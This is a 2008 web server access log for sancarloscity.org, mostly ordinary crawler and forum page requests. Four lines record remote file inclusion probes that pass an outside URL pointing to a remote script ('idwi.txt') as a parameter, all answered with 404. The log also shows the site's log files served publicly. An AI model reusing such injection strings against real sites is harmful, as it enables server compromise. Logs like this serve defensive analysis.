74.6.22.105 - - [28/Aug/2008:05:32:11 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
74.6.22.105 - - [28/Aug/2008:05:32:12 -0700] "GET /qphotogallery/displayimage.php?album=13&pos=9 HTTP/1.0" 200 21591 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:18 -0700] "GET /forum2/index.php?showtopic=92 HTTP/1.1" 200 12151 "http://search.yahoo.com/search;_ylt=A0oGkxOzmrZILEkBqxBXNyoA?fr2=sg-gac&sado=1&p=iphone&fr=yfp-t-501&ei=UTF-8&fp_ip=PH&meta=fl%3D0%26vc%3Dph&rd=adv" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:18 -0700] "GET /forum2/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:18 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 200 31951 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:20 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/css_rte.css HTTP/1.1" 200 4313 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:20 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 200 6562 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:21 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 200 17304 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:22 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 200 6059 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:23 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 200 2931 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:24 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 200 2294 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:24 -0700] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 200 1226 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:24 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 200 8834 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:32:24 -0700] "GET /forum2/index.php?showtopic=92 HTTP/1.0" 200 11725 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:25 -0700] "GET /forum2/jscripts/ips_xmlhttprequest.js HTTP/1.1" 200 3619 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:25 -0700] "GET /forum2/style_images/red_crysta/tile_back.gif HTTP/1.1" 200 940 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:25 -0700] "GET /forum2/style_images/red_crysta/tile_sub.gif HTTP/1.1" 200 1581 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:25 -0700] "GET /forum2/jscripts/ipb_global_xmlenhanced.js HTTP/1.1" 200 5981 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:26 -0700] "GET /forum2/style_images/red_crysta/tile_sub-lite.gif HTTP/1.1" 200 1511 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:26 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 200 4105 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:27 -0700] "GET /forum2/style_images/red_crysta/loading_anim.gif HTTP/1.1" 200 2800 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:27 -0700] "GET /forum2/style_images/red_crysta/close.png HTTP/1.1" 200 834 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:28 -0700] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 200 14082 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:28 -0700] "GET /forum2/style_images/red_crysta/nav.gif HTTP/1.1" 200 113 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:29 -0700] "GET /forum2/jscripts/ips_text_editor_lite.js HTTP/1.1" 200 9928 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:30 -0700] "GET /forum2/style_images/red_crysta/menu_action_down.gif HTTP/1.1" 200 100 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:30 -0700] "GET /forum2/style_images/red_crysta/t_reply.gif HTTP/1.1" 200 1957 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:30 -0700] "GET /forum2/style_images/red_crysta/nav_m.gif HTTP/1.1" 200 53 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:30 -0700] "GET /forum2/style_images/red_crysta/t_new.gif HTTP/1.1" 200 1947 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:31 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/user-offline.png HTTP/1.1" 200 569 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:31 -0700] "GET /forum2/style_images/red_crysta/to_post_off.gif HTTP/1.1" 200 64 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:31 -0700] "GET /forum2/style_images/red_crysta/pip.gif HTTP/1.1" 200 125 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:31 -0700] "GET /forum2/style_images/red_crysta/spacer.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:32 -0700] "GET /forum2/style_images/red_crysta/p_up.gif HTTP/1.1" 200 1402 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:32 -0700] "GET /forum2/style_images/red_crysta/p_mq_add.gif HTTP/1.1" 200 1633 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:32:32 -0700] "GET /picgallery/thumbnails.php?album=28 HTTP/1.0" 200 9711 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:32 -0700] "GET /forum2/style_images/red_crysta/p_quote.gif HTTP/1.1" 200 1516 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:32 -0700] "GET /forum2/uploads/av-4.jpg HTTP/1.1" 200 2507 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:33 -0700] "GET /forum2/uploads/av-14.jpg HTTP/1.1" 200 2248 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:33 -0700] "GET /forum2/uploads/av-24.jpg HTTP/1.1" 200 4212 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:33 -0700] "GET /forum2/uploads/av-75.jpg HTTP/1.1" 200 1424 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:34 -0700] "GET /forum2/uploads/av-258.jpg HTTP/1.1" 200 2044 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:34 -0700] "GET /forum2/style_emoticons/default/smile.gif HTTP/1.1" 200 699 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:34 -0700] "GET /forum2/uploads/av-94.jpg HTTP/1.1" 200 2450 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:35 -0700] "GET /forum2/style_images/red_crysta/post_snapback.gif HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:35 -0700] "GET /forum2/style_images/red_crysta/rss.png HTTP/1.1" 200 1090 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:35 -0700] "GET /forum2/index.php?s=967346bd4e673f8168f077917c58add5&act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:36 -0700] "GET /forum2/style_images/red_crysta/menu_item.gif HTTP/1.1" 200 87 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:36 -0700] "GET /forum2/uploads/photo-thumb-2.jpg HTTP/1.1" 200 1179 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:36 -0700] "GET /forum2/style_images/red_crysta/rating_4_mini.gif HTTP/1.1" 200 1042 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:36 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_male.png HTTP/1.1" 200 692 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:37 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/pp-blank-thumb.png HTTP/1.1" 200 10903 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:37 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/find_posts.png HTTP/1.1" 200 677 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:37 -0700] "GET /forum2/style_images/red_crysta/rating_0_mini.gif HTTP/1.1" 200 256 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:37 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_mystery.png HTTP/1.1" 200 697 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:38 -0700] "GET /forum2/uploads/photo-thumb-94.jpg HTTP/1.1" 200 1434 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:38 -0700] "GET /forum2/style_images/red_crysta/tile_cat.gif HTTP/1.1" 200 2760 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:32:38 -0700] "GET /forum2/style_images/red_crysta/css_img_quote.gif HTTP/1.1" 200 406 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
120.28.210.120 - - [28/Aug/2008:05:33:05 -0700] "GET /logs/access_080728.log HTTP/1.1" 200 262144 "http://search.yahoo.com/search;_ylt=A0oGkjL5mrZIgnkB_a9XNyoA?p=%22biography+of+francisco+buencamino%22&y=Search&fr=yfp-t-501&ei=UTF-8&fp_ip=PH&meta=fl%3D0%26vc%3Dph&rd=adv" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
82.99.30.53 - - [28/Aug/2008:05:33:08 -0700] "GET /jodera2/privmsg.php?folder=inbox&sid=d265899b2180f5b3b1426560ea41ae26 HTTP/1.0" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
120.28.210.120 - - [28/Aug/2008:05:33:11 -0700] "GET /logs/access_080728.log HTTP/1.1" 200 262144 "http://search.yahoo.com/search;_ylt=A0oGkjL5mrZIgnkB_a9XNyoA?p=%22biography+of+francisco+buencamino%22&y=Search&fr=yfp-t-501&ei=UTF-8&fp_ip=PH&meta=fl%3D0%26vc%3Dph&rd=adv" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:33:17 -0700] "GET /classifieds/index.php?method=create_form&list=classifiedssearch&fromlist=advertisement&frommethod=showdetails&fromid=257&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=70&cid=70 HTTP/1.0" 200 8174 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:05:33:25 -0700] "GET /logs/access_080408.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:33:31 -0700] "GET /index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 758 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:33:31 -0700] "GET /logs/access_080405.log/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 768 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:33:31 -0700] "GET /logs/access_070906.log/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 768 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
163.19.117.1 - - [28/Aug/2008:05:33:31 -0700] "GET /logs/index.php?act=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
82.174.19.188 - - [28/Aug/2008:05:33:41 -0700] "GET /sampo/flv/082008/1.flv HTTP/1.1" 200 7208960 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:43 -0700] "GET /forum2/index.php?showtopic=92 HTTP/1.1" 200 12058 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:44 -0700] "GET /forum2/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:44 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 200 31951 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:46 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/css_rte.css HTTP/1.1" 200 4313 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:47 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 200 6562 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:47 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 200 17304 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:49 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 200 6059 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:50 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 200 2931 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:50 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 200 2294 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:51 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 200 8834 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:51 -0700] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 200 1226 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:52 -0700] "GET /forum2/jscripts/ips_xmlhttprequest.js HTTP/1.1" 200 3619 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:52 -0700] "GET /forum2/style_images/red_crysta/tile_back.gif HTTP/1.1" 200 940 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:52 -0700] "GET /forum2/style_images/red_crysta/tile_sub.gif HTTP/1.1" 200 1581 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:53 -0700] "GET /forum2/jscripts/ipb_global_xmlenhanced.js HTTP/1.1" 200 5981 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:05:33:53 -0700] "GET /forum2/index.php?s=4945093cea0812d0c75e4b47c8dd7d83&automodule=blog&blogid=5&&req=sendentry&eid=32&st= HTTP/1.1" 200 2963 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:53 -0700] "GET /forum2/style_images/red_crysta/tile_sub-lite.gif HTTP/1.1" 200 1511 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
203.84.181.238 - - [28/Aug/2008:05:33:53 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 200 4105 "http://www.sancarloscity.org/forum2/index.php?showtopic=92" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.sancarloscity.org"
